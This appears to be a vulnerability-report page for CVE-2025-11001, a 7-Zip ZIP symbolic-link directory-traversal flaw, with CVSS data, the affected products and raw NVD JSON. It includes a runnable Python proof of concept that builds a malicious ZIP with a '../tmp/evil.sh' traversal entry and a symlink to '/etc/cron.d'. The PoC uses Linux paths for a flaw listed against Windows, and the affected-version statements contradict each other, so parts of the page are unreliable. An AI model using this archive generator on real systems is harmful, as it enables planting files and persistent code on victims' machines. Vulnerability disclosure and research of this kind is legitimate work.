Security Vulnerability Report
中文
CVE-2025-11001 CVSS 7.8 HIGH

CVE-2025-11001

Published: 2025-11-19 22:16:02
Last Modified: 2025-11-24 15:07:33
Source: [email protected]

Description

7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26753.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:7-zip:7-zip:24.09:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:x64:* - NOT VULNERABLE
7-Zip < 24.09(所有使用存在漏洞的ZIP解析模块的版本)
所有支持ZIP格式符号链接解析的7-Zip版本均受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-11001 PoC - 7-Zip ZIP Symbolic Link Directory Traversal # Generate malicious ZIP file with symbolic link for path traversal import zipfile import os import sys def create_malicious_zip(output_path, target_dir='../../../../../../../../tmp'): """ Create a malicious ZIP file containing symbolic link entries that can cause directory traversal during extraction. """ try: with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as zipf: # Create a symbolic link entry pointing to arbitrary directory # The external file attribute is set to indicate a symbolic link # Target path traversal: ../../../tmp/pwned link_target = f"{target_dir}/pwned" # Create a file entry that will be written via the symlink malicious_content = b'#!/bin/bash\n# Malicious payload\necho "PWNED" > /tmp/pwned.txt\n' # Add a file that will traverse to unintended location # File name contains path traversal sequences info = zipfile.ZipInfo(filename='../../../../tmp/evil.sh') info.external_attr = 0o755 << 16 # Executable file attribute zipf.writestr(info, malicious_content) # Alternative: Create symlink entry symlink_info = zipfile.ZipInfo(filename='malicious_link') symlink_info.external_attr = 0o777 << 16 | 0o120000 # Symlink attribute zipf.writestr(symlink_info, b'../../../../etc/cron.d/malicious_task') print(f'[+] Malicious ZIP created: {output_path}') print(f'[*] Target traversal path: {target_dir}') print('[*] When extracted with vulnerable 7-Zip, files will be written to unintended locations') except Exception as e: print(f'[-] Error creating ZIP: {e}') return False return True if __name__ == '__main__': output = 'CVE-2025-11001_poc.zip' create_malicious_zip(output) print('\n[!] This PoC is for educational and security research purposes only.') print('[!] Do not use for unauthorized testing or attacks.')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11001", "sourceIdentifier": "[email protected]", "published": "2025-11-19T22:16:02.457", "lastModified": "2025-11-24T15:07:32.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26753."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:7-zip:7-zip:24.09:*:*:*:*:*:*:*", "matchCriteriaId": "B0CE235C-0238-4BFD-A447-9B83469F6598"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:x64:*", "matchCriteriaId": "82132539-3C34-4B63-BE2A-F51077D8BC5A"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-949/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.